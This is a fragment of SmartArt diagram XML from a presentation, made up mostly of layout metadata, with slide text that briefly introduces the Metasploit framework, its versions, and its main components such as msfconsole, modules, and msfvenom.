      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5DFEB34D-806D-485B-8E28-51FEF3AA1A4C}" type="parTrans" cxnId="{E9CE7BB5-DE94-41FB-9A56-22602D727FE1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D351C0FF-463A-4C36-A591-56BAD0887741}" type="sibTrans" cxnId="{E9CE7BB5-DE94-41FB-9A56-22602D727FE1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{084D4C39-5270-4E12-BB13-94A99B2779C3}" type="pres">
      <dgm:prSet presAssocID="{D2CABFEE-A6E7-4C79-B243-3FDE73D096E9}" presName="diagram" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{23DA984D-9BFF-4512-8A99-EAB101533A67}" type="pres">
      <dgm:prSet presAssocID="{90758AD1-037B-474C-89A6-53EDE0858175}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C0AC4A74-AA0A-4A97-A54B-95B3F696A76E}" type="pres">
      <dgm:prSet presAssocID="{1871F033-38D9-4D64-8BF4-726B16026788}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6556AB75-E671-47A5-873B-916EC07768D4}" type="pres">
      <dgm:prSet presAssocID="{30C4173E-73EA-47B5-B368-3C3D7ECB800F}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A374F716-E283-49A7-9478-F43C7A252EBD}" type="pres">
      <dgm:prSet presAssocID="{59A9220E-0EB0-4E51-B39D-C33D25AA62F8}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1787256F-ABA0-4DA3-BE17-5FCCF1F4E59F}" type="pres">
      <dgm:prSet presAssocID="{6F8D6BEA-2F05-4B48-AB40-C4C15A783145}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{68A56802-D34D-41C6-B761-514A60638A6B}" type="pres">
      <dgm:prSet presAssocID="{22655585-66F0-4D85-94A3-94CEFCE63B19}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{83C4CBFC-67B9-40FF-BE11-D6F2FA892C87}" type="pres">
      <dgm:prSet presAssocID="{805C2808-20AF-40A9-BBB6-44E200E65079}" presName="node" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A2ACC3AD-FC71-4F3B-B04B-BFF8438A5E78}" type="pres">
      <dgm:prSet presAssocID="{FED8CBBB-200F-4AAA-B8C6-87BEE6778C65}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3FA681EE-CD68-40DA-A3F5-A7756E995A9B}" type="pres">
      <dgm:prSet presAssocID="{42C2919B-50EC-460D-B3B1-EEB7ADC655BE}" presName="node" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{275832E5-CED2-4582-81CF-69A4A34DA463}" type="pres">
      <dgm:prSet presAssocID="{CCDB8045-7FDC-4FE2-85D0-AA8761B95853}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{11BA2360-C4E1-4F61-854A-21BC11370288}" type="pres">
      <dgm:prSet presAssocID="{A58B9BC7-EBA8-4761-A654-2D392D673B56}" presName="node" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{AA398813-72D4-41E6-A775-2DAA48F56462}" srcId="{D2CABFEE-A6E7-4C79-B243-3FDE73D096E9}" destId="{6F8D6BEA-2F05-4B48-AB40-C4C15A783145}" srcOrd="2" destOrd="0" parTransId="{93A18ECA-9804-4E13-8750-4AF7B1DAE5E7}" sibTransId="{22655585-66F0-4D85-94A3-94CEFCE63B19}"/>
    <dgm:cxn modelId="{73663B16-C68B-4083-BC3A-4C219D2981F6}" type="presOf" srcId="{F6B3CE81-98CE-4183-9D53-17DC175FF69B}" destId="{6556AB75-E671-47A5-873B-916EC07768D4}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{8380B11D-35DC-4690-BCD0-31E3306BDA71}" type="presOf" srcId="{805C2808-20AF-40A9-BBB6-44E200E65079}" destId="{83C4CBFC-67B9-40FF-BE11-D6F2FA892C87}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{BF577922-9919-4966-853B-53706EB87745}" srcId="{90758AD1-037B-474C-89A6-53EDE0858175}" destId="{9979B333-458E-4B4E-AF07-6A8C240BCE71}" srcOrd="3" destOrd="0" parTransId="{1E8F4250-AB94-4911-A1B4-249291DFCEA0}" sibTransId="{9DC497B7-BCCD-4B87-B348-3934D4F1AA6B}"/>
    <dgm:cxn modelId="{6653C823-203A-4F24-8182-F54DADD1D6F4}" type="presOf" srcId="{30C4173E-73EA-47B5-B368-3C3D7ECB800F}" destId="{6556AB75-E671-47A5-873B-916EC07768D4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{5528FE29-B0F6-4B21-BD49-BEE9CF6B20D3}" srcId="{30C4173E-73EA-47B5-B368-3C3D7ECB800F}" destId="{E8ADE5CF-20AF-4A02-9CBB-31C5E232AF08}" srcOrd="0" destOrd="0" parTransId="{412DB805-2892-4D6A-99ED-7FDFAC275F6A}" sibTransId="{7AF74C24-33E4-40ED-BBE0-8C63223A46F7}"/>
    <dgm:cxn modelId="{02B3713C-840C-45D1-8F69-86B2500CAE64}" srcId="{30C4173E-73EA-47B5-B368-3C3D7ECB800F}" destId="{F6B3CE81-98CE-4183-9D53-17DC175FF69B}" srcOrd="2" destOrd="0" parTransId="{537D8FCE-E00B-45E0-AFF6-0CF1FAE5F6E8}" sibTransId="{94C09812-0595-4E05-937A-9B356B94DF8C}"/>
    <dgm:cxn modelId="{47BB025C-E4A5-4A22-AA66-AE21A80EA009}" srcId="{30C4173E-73EA-47B5-B368-3C3D7ECB800F}" destId="{2D017B98-E9FE-4D72-87C9-A93354B5E0F6}" srcOrd="1" destOrd="0" parTransId="{2D0AC334-3596-4FAA-ACE0-D5C215D002E1}" sibTransId="{9FD2F8BC-6E2A-469A-9C51-4E18570EB13D}"/>
    <dgm:cxn modelId="{AC55E36D-C71D-41D7-9613-37BA3AED31B0}" type="presOf" srcId="{6F8D6BEA-2F05-4B48-AB40-C4C15A783145}" destId="{1787256F-ABA0-4DA3-BE17-5FCCF1F4E59F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{B8A79C73-B904-4AB8-9444-B76223075442}" srcId="{D2CABFEE-A6E7-4C79-B243-3FDE73D096E9}" destId="{805C2808-20AF-40A9-BBB6-44E200E65079}" srcOrd="3" destOrd="0" parTransId="{88FDCC9B-6863-48A0-8CA8-8A7E095755F5}" sibTransId="{FED8CBBB-200F-4AAA-B8C6-87BEE6778C65}"/>
    <dgm:cxn modelId="{B976AA56-EEBA-42C2-8803-8768B346AC10}" type="presOf" srcId="{A58B9BC7-EBA8-4761-A654-2D392D673B56}" destId="{11BA2360-C4E1-4F61-854A-21BC11370288}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{FFD78057-1031-43E7-9582-7F75B148B087}" srcId="{D2CABFEE-A6E7-4C79-B243-3FDE73D096E9}" destId="{90758AD1-037B-474C-89A6-53EDE0858175}" srcOrd="0" destOrd="0" parTransId="{FEAA2E06-3747-445E-A5E9-B1B8B5515AE0}" sibTransId="{1871F033-38D9-4D64-8BF4-726B16026788}"/>
    <dgm:cxn modelId="{A458627B-D871-43D8-BCA3-40DB5B99E427}" srcId="{90758AD1-037B-474C-89A6-53EDE0858175}" destId="{4D86A241-97FF-4773-9ECF-5D5C82E261CE}" srcOrd="2" destOrd="0" parTransId="{8B1F6FDE-5E13-45D3-8BE3-06325A259D7E}" sibTransId="{8E5596A8-8044-47B9-A318-D8505A837C88}"/>
    <dgm:cxn modelId="{93B6707D-BC83-475D-B364-48A12335D336}" type="presOf" srcId="{4D86A241-97FF-4773-9ECF-5D5C82E261CE}" destId="{23DA984D-9BFF-4512-8A99-EAB101533A67}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{89A16D80-7561-4D47-875E-6D15160792B8}" srcId="{90758AD1-037B-474C-89A6-53EDE0858175}" destId="{354768C2-EE63-4475-B73A-5CD9F0B96F74}" srcOrd="1" destOrd="0" parTransId="{0124DFA5-5037-4E7B-867F-9A91DAD83BFC}" sibTransId="{CDA87040-3BCC-43D2-BCFE-5EAC88D178D6}"/>
    <dgm:cxn modelId="{C42A078B-0C72-4709-8A0A-4D7AB75FC8D3}" srcId="{D2CABFEE-A6E7-4C79-B243-3FDE73D096E9}" destId="{30C4173E-73EA-47B5-B368-3C3D7ECB800F}" srcOrd="1" destOrd="0" parTransId="{F56C6B83-8A16-4072-BE89-BD416E066BDB}" sibTransId="{59A9220E-0EB0-4E51-B39D-C33D25AA62F8}"/>
    <dgm:cxn modelId="{5A44008E-6D61-4FB4-A8FF-9F02758EEB57}" type="presOf" srcId="{9979B333-458E-4B4E-AF07-6A8C240BCE71}" destId="{23DA984D-9BFF-4512-8A99-EAB101533A67}" srcOrd="0" destOrd="4" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{EFF30D95-6D5E-4BB3-A802-BF8D6347F40D}" type="presOf" srcId="{D2CABFEE-A6E7-4C79-B243-3FDE73D096E9}" destId="{084D4C39-5270-4E12-BB13-94A99B2779C3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{B9D29AA1-F000-418C-B689-84F23E00585A}" type="presOf" srcId="{382515D6-C04A-41D5-A662-FA1DEAA72D79}" destId="{23DA984D-9BFF-4512-8A99-EAB101533A67}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{710DCBB4-925D-4581-A9BB-C2437E12C154}" type="presOf" srcId="{42C2919B-50EC-460D-B3B1-EEB7ADC655BE}" destId="{3FA681EE-CD68-40DA-A3F5-A7756E995A9B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{E9CE7BB5-DE94-41FB-9A56-22602D727FE1}" srcId="{D2CABFEE-A6E7-4C79-B243-3FDE73D096E9}" destId="{A58B9BC7-EBA8-4761-A654-2D392D673B56}" srcOrd="5" destOrd="0" parTransId="{5DFEB34D-806D-485B-8E28-51FEF3AA1A4C}" sibTransId="{D351C0FF-463A-4C36-A591-56BAD0887741}"/>
    <dgm:cxn modelId="{302B13BA-8415-499D-9F97-9B7D27408894}" type="presOf" srcId="{354768C2-EE63-4475-B73A-5CD9F0B96F74}" destId="{23DA984D-9BFF-4512-8A99-EAB101533A67}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{217CCEC8-1F19-49A8-938B-B3651FD64F78}" type="presOf" srcId="{90758AD1-037B-474C-89A6-53EDE0858175}" destId="{23DA984D-9BFF-4512-8A99-EAB101533A67}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{B6FDEAD1-C279-4986-AB57-62CCF1F3B0D7}" srcId="{90758AD1-037B-474C-89A6-53EDE0858175}" destId="{382515D6-C04A-41D5-A662-FA1DEAA72D79}" srcOrd="0" destOrd="0" parTransId="{012BC8CF-8AFA-44AD-9DA0-FADE9CAE725C}" sibTransId="{58F38959-B764-4557-BE6C-2A4EAEDCFDE8}"/>
    <dgm:cxn modelId="{529E84D2-6AAC-4550-9E99-476E3ADD9E74}" type="presOf" srcId="{E8ADE5CF-20AF-4A02-9CBB-31C5E232AF08}" destId="{6556AB75-E671-47A5-873B-916EC07768D4}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{43C07ED4-5FF8-4D0E-8114-C6828347E053}" type="presOf" srcId="{2D017B98-E9FE-4D72-87C9-A93354B5E0F6}" destId="{6556AB75-E671-47A5-873B-916EC07768D4}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{6AE54BE6-15F3-44E4-8CE5-F3F8E0F99852}" srcId="{D2CABFEE-A6E7-4C79-B243-3FDE73D096E9}" destId="{42C2919B-50EC-460D-B3B1-EEB7ADC655BE}" srcOrd="4" destOrd="0" parTransId="{1EA13C01-4E6F-485C-889B-0DC08E153131}" sibTransId="{CCDB8045-7FDC-4FE2-85D0-AA8761B95853}"/>
    <dgm:cxn modelId="{47501F17-5DBB-4DCC-83FD-123B303C8E77}" type="presParOf" srcId="{084D4C39-5270-4E12-BB13-94A99B2779C3}" destId="{23DA984D-9BFF-4512-8A99-EAB101533A67}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{E27365CE-AD26-40B7-8374-6CE1C1534873}" type="presParOf" srcId="{084D4C39-5270-4E12-BB13-94A99B2779C3}" destId="{C0AC4A74-AA0A-4A97-A54B-95B3F696A76E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{75EAA14C-373B-474D-B38B-B5634D2B92B9}" type="presParOf" srcId="{084D4C39-5270-4E12-BB13-94A99B2779C3}" destId="{6556AB75-E671-47A5-873B-916EC07768D4}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{640CB3F2-C37F-4BE1-A9CD-4F60DE20C679}" type="presParOf" srcId="{084D4C39-5270-4E12-BB13-94A99B2779C3}" destId="{A374F716-E283-49A7-9478-F43C7A252EBD}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{C93DC5CB-4C13-4BF0-A767-99A978FF7BD2}" type="presParOf" srcId="{084D4C39-5270-4E12-BB13-94A99B2779C3}" destId="{1787256F-ABA0-4DA3-BE17-5FCCF1F4E59F}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{7926FC81-0551-4512-917A-DA0C014B9195}" type="presParOf" srcId="{084D4C39-5270-4E12-BB13-94A99B2779C3}" destId="{68A56802-D34D-41C6-B761-514A60638A6B}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{D32F1A65-9C69-4377-8182-FED10C918BC6}" type="presParOf" srcId="{084D4C39-5270-4E12-BB13-94A99B2779C3}" destId="{83C4CBFC-67B9-40FF-BE11-D6F2FA892C87}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{10D415C8-4A99-4567-A60B-026BC30AACD3}" type="presParOf" srcId="{084D4C39-5270-4E12-BB13-94A99B2779C3}" destId="{A2ACC3AD-FC71-4F3B-B04B-BFF8438A5E78}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{4EEB976D-CDDD-4163-B988-E5C25E7EFD8D}" type="presParOf" srcId="{084D4C39-5270-4E12-BB13-94A99B2779C3}" destId="{3FA681EE-CD68-40DA-A3F5-A7756E995A9B}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{A3272B36-08E2-48F2-8AD5-6AA221B602C3}" type="presParOf" srcId="{084D4C39-5270-4E12-BB13-94A99B2779C3}" destId="{275832E5-CED2-4582-81CF-69A4A34DA463}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{A0E6E1B1-6BF9-4CA8-8E18-1143DBBC572C}" type="presParOf" srcId="{084D4C39-5270-4E12-BB13-94A99B2779C3}" destId="{11BA2360-C4E1-4F61-854A-21BC1137028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B4467E-CDAD-4A92-86B3-460FFE55652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79C5E2-22DB-492F-918E-4381259D74DC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0" dirty="0"/>
            <a:t>Metasploit is the most popular exploitation framework</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A317EA6A-2698-4ED5-8EF5-CE0C32065B56}" type="parTrans" cxnId="{8E18F449-2DDB-4EFE-8550-00C5EDB4A890}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C1CCB6E6-223C-4724-AF49-D844CB24A1AB}" type="sibTrans" cxnId="{8E18F449-2DDB-4EFE-8550-00C5EDB4A890}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EC66D02A-5A22-4B0B-B09C-33A83E6AEE40}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>Metasploit Versions:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5C3CA703-C1E0-4164-A4CC-93F22DED029D}" type="parTrans" cxnId="{AA88DE23-7BAE-4766-8687-C84E7EA2E4DC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8573465F-7E9C-4F8C-9584-4ACE89DB0FC9}" type="sibTrans" cxnId="{AA88DE23-7BAE-4766-8687-C84E7EA2E4DC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A9DEE684-1ACF-4CF2-8234-880F69897954}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>Metasploit Pro:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t> Commercial, with GUI, for automation and task management.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3FEE2CF3-84E2-4B44-AF66-0008913B273A}" type="parTrans" cxnId="{A1A37AB9-1372-4963-8880-EFF785D4F323}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2A63675E-17D2-4758-AEC9-00E120F6F7D0}" type="sibTrans" cxnId="{A1A37AB9-1372-4963-8880-EFF785D4F323}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6D725EC2-40E0-45A5-9A9D-A2ECE71F7AAB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>Metasploit Framework:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t> Open-source, command-line-based, widely used in penetration testing.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EF6EE85E-7A7E-430C-B511-6678D623B7B9}" type="parTrans" cxnId="{AEEA7035-C499-4B31-AB1F-D0755F3D3D91}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A28B39E1-1EAF-4A55-87E1-36F7F34C5E3C}" type="sibTrans" cxnId="{AEEA7035-C499-4B31-AB1F-D0755F3D3D91}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DE670228-4136-4FF9-839E-9569591B4F46}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>Main Components:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A3A7140A-BAAC-4E7D-851F-3256036E5504}" type="parTrans" cxnId="{079BA937-0DEB-4754-951A-4C8117288018}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2717862E-B7E0-41F2-AAEA-DD4258DC2F99}" type="sibTrans" cxnId="{079BA937-0DEB-4754-951A-4C8117288018}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AB970D74-91F1-4F49-8537-458188927989}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>msfconsole:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t> Command-line interface.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{04331F20-7E80-4AE0-A504-931B7759E57C}" type="parTrans" cxnId="{E30A1202-1AB6-48DE-AAB3-0F15BA412A70}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C70209A0-77B9-4F6A-87D9-BD7471CB2D80}" type="sibTrans" cxnId="{E30A1202-1AB6-48DE-AAB3-0F15BA412A70}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B82D20A2-7666-40A1-87CC-75E7381F04CE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>Modules:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t> Exploits, scanners, payloads, etc.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5AE90DCC-C7BD-4ACD-9287-91B095D7B3A3}" type="parTrans" cxnId="{DD3114B1-60FF-41B9-B8EC-A09B988A0845}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9F25BB13-2303-4998-810E-442DC8B22580}" type="sibTrans" cxnId="{DD3114B1-60FF-41B9-B8EC-A09B988A0845}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CDC4C92D-9D3C-43D6-A328-8ED1A922499C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>Tools:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t> Vulnerability research tools like msfvenom, pattern_create, etc.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{043AEA94-C1A9-4EC5-A44F-BA46C59DB550}" type="parTrans" cxnId="{1385431E-0242-4B28-BB80-2DC4DF9CE3FD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9250E001-5C44-4DB7-8501-1FE7B7D6EB29}" type="sibTrans" cxnId="{1385431E-0242-4B28-BB80-2DC4DF9CE3FD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D39805BD-11A7-42C8-8EBB-8DB7D8F2A96E}" type="pres">
      <dgm:prSet presAssocID="{43B4467E-CDAD-4A92-86B3-460FFE556520}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C4574B46-B3AB-420C-9ACE-8FB24A04CA82}" type="pres">
      <dgm:prSet presAssocID="{7C79C5E2-22DB-492F-918E-4381259D74DC}" presName="parentText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A8BA7C88-E234-4D1C-BE18-25C9F8C5B15A}" type="pres">
      <dgm:prSet presAssocID="{C1CCB6E6-223C-4724-AF49-D844CB24A1AB}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
